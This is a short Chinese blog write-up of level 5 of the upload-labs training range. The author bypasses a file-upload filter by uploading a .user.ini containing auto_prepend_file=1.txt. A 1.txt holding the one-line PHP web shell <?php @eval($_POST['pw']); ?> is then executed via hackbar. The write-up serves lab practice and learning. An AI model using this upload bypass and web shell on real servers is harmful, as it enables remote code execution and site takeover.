upload-labs关卡记录5

这一关,卡了好久,这里我的靶场的源代码,和我看别的师傅发的不一样,我的这里的源码带有小写转换:

是不能通过大小写进行绕过,最后找到这个师傅的文章:upload-labs通关-CSDN博客

这里第五关用到的方法,可以进行绕过,原理师傅讲的也很清晰,原理类似于之前的.htaccess绕过,通过添加配置文件。然后再上传一句话木马来进行实现:

就是将这里的代码:auto_prepend_file=1.txt

写进命名为.user.ini的文件中,然后上传这个文件,然后再上传命名为1.txt的文件。这时进入url为:upload-labs:8899/upload/readme.php

然后再使用hackbar来执行刚才上传的一句话木马,就是写进1.txt的一句话木马。

我这里的一句话木马为:<?php @eval($_POST['pw']); ?>

相关推荐
用户9272472502196 小时前
PHP+JS+CSS+JSON 单页新闻系统实现方案
php
花木偶6 小时前
【郑大二年级信安小学期】Day6:CTF密码学&杂项&工具包
安全·web安全·密码学
Ashlee_code8 小时前
什么是Web3?金融解决方案
开发语言·金融·架构·eclipse·web3·区块链·php
Sally璐璐13 小时前
IPSAN 共享存储详解:架构、优化与落地实践指南
开发语言·php
黑客老李14 小时前
EDUSRC:智慧校园通用漏洞挖掘(涉校园解决方案商)
服务器·前端·网络·安全·web安全
程序猿阿伟15 小时前
《声音的变形记:Web Audio API的实时特效法则》
开发语言·前端·php
薄荷椰果抹茶15 小时前
【网络安全基础】第七章---无线网络安全
网络·安全·web安全
weixin_4723394615 小时前
网络安全之重放攻击:原理、危害与防御之道
安全·web安全
咖啡啡不加糖15 小时前
暴力破解漏洞与命令执行漏洞
java·后端·web安全
weixin_4723394615 小时前
网络安全之注入攻击:原理、危害与防御之道
安全·web安全